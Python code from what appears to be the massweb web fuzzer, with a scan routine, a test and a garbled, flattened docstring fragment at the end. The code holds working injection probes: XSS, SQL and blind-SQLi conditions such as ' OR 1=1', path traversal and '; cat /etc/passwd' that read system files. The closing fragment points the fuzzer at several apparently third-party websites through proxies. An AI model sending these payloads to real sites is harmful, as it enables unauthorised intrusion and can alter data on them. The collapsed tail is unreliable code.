def fuzz(targets):
    """Run the generic web fuzzer, then the blind-SQLi fuzzer, over ``targets``.

    This is a generator: no request is issued until the first result is
    requested. At that point ``WebFuzzer.fuzz()`` and ``BSQLiFuzzer.fuzz()``
    are both called, in that order, before the first result is yielded.
    Results of the generic pass come out first, followed by the blind-SQLi
    results.

    Reads ``proxy_scan_list`` from module scope. Thread counts, per-URL time
    budget and request timeout are fixed here rather than taken from the
    caller.
    """
    # One probe string per vulnerability class. check_type_list presumably
    # selects which response checks are applied to a probe -- confirm in Payload.
    probes = [
        Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list=["xss"]),
        Payload("')--#", check_type_list=["sqli", "xpathi"]),
        Payload('../../../../../../../../../../../../../../../../../../../../../../../etc/passwd',
                check_type_list=["trav"]),
        Payload('<!--', check_type_list=["xpathi"]),
        # NOTE(review): unlike the probes above, this one is created without a
        # check_type_list. Confirm that Payload's default still lets a hit be
        # classified; otherwise OS command injection findings may go unreported.
        Payload('; cat /etc/passwd'),
    ]

    web_fuzzer = WebFuzzer(
        targets,
        num_threads=25,
        time_per_url=5,
        request_timeout=4,
        proxy_list=proxy_scan_list,
        hadoop_reporting=True,
    )
    for probe in probes:
        web_fuzzer.add_payload(probe)
    web_fuzzer.generate_fuzzy_targets()
    wf_results = web_fuzzer.fuzz()

    # Boolean-based blind SQLi: each group pairs an always-true condition with
    # an always-false one, tagged through the "truth" flag. Presumably the
    # fuzzer compares the responses to the two -- confirm in BSQLiFuzzer.
    # NOTE(review): an always-true OR condition widens the matched row set if
    # the injected parameter ends up in an UPDATE/DELETE, so the second group
    # can be state-changing on the scanned application.
    payload_groups = [
        BSQLIPayloadGroup(
            BSQLIPayload(" AND 1=1", {"truth": True}),
            BSQLIPayload(" AND 1=2", {"truth": False}),
        ),
        BSQLIPayloadGroup(
            BSQLIPayload(" OR 1=1", {"truth": True}),
            BSQLIPayload(" OR 1=2", {"truth": False}),
        ),
    ]
    blind_fuzzer = BSQLiFuzzer(
        targets,
        bsqli_payload_groups=payload_groups,
        hadoop_reporting=True,
        num_threads=10,
    )
    bf_results = blind_fuzzer.fuzz()

    # Generic findings first, blind-SQLi findings second.
    for batch in (wf_results, bf_results):
        for result in batch:
            yield result
def test_webfuzzer(self):
    """Drive one full WebFuzzer run over the module-level targets and payloads.

    Uses ``targets``, ``payloads`` and ``proxy_scan_list`` from the enclosing
    module and turns Hadoop reporting off for the run.
    """
    fuzzer = WebFuzzer(
        targets,
        num_threads=25,
        time_per_url=5,
        request_timeout=4,
        proxy_list=proxy_scan_list,
        hadoop_reporting=False,
    )
    for payload in payloads:
        fuzzer.add_payload(payload)
    fuzzer.generate_fuzzy_targets()
    # NOTE(review): no assertion on the outcome is visible here, so as shown
    # this only fails when the run raises. Asserting on the expected findings
    # would let a detection regression fail the test.
    result = fuzzer.fuzz()
print "Results of our fuzzing:" for r in wf.fuzz(): print r, r.fuzzy_target.ttype, r.fuzzy_target.payload """ from massweb.fuzzers.web_fuzzer import WebFuzzer from massweb.payloads.payload import Payload proxies = [{"http": "user:password@http://proxy.example.com:1234/some/path"}, {"http": "otheruser:otherpassword@http://proxy2.example.net:6789/some/path"}] xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"]) trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list=["trav"]) sqli_xpathi_payload = Payload("')--", check_type_list=["sqli", "xpathi"]) wf = WebFuzzer(num_threads=30, time_per_url=5, proxy_list=proxies) wf.add_payload(xss_payload) wf.add_payload(trav_payload) wf.add_payload(sqli_xpathi_payload) wf.add_target_from_url(u"http://course.hyperiongray.com/vuln1") wf.add_target_from_url(u"http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/") wf.add_target_from_url(u"http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E") wf.add_target_from_url(u"http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&amp;ProName=1") wf.add_target_from_url(u"http://www.gayoutdoors.com/page.cfm?snippetset=yes&amp;typeofsite=snippetdetail&amp;ID=1368&amp;Sectionid=1") wf.add_target_from_url(u"http://www.dobrevsource.org/index.php?id=1") print "Targets list pre post determination:" for target in wf.targets: print target print "Targets list after additional injection points have been found:" wf.determine_posts_from_targets()